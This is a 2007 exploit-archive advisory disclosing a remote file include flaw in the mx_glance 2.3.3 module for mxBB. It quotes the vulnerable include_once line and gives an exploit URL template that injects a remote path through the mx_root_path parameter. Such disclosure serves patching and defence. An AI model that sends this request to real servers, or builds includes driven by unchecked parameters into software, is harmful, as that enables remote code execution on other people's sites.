id: 2181
date: 09/28/2007
title: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
author: bd0rk
cves: 

=============================================================
mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
=============================================================



	++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +    mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability   +
        +                                                                    +
        +                   Discovered by bd0rk || SOH-Crew                  +
        +                                                                    +
        +                         www.soh-crew.it.tt                         +
        +                                                                    +
        +            The german Coding and IT-Security Ressource             +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Vendor: http://www.mx-system.com

Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=336


Vulnerable Code in contrib/mx_glance_sdesc.php line 89

####################################################################

include_once($mx_root_path . 'includes/mx_functions_tools.'.$phpEx);

####################################################################

[+]Exploit: http://[t4rg3t]/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode]


Description: The parameter $mx_root_path is not declared before include_once.

Fixtip: Declare the parameter in sourcecode or use hacking attempt.


Greetings: str0ke, TheJT, Bedrik, SkyXNet, Kirsche, Viggy, x0r_32, SecurityFocus


####The 18 years old, german Hacker bd0rk####


/I am out =)




#  0day.today [2023-03-26]  #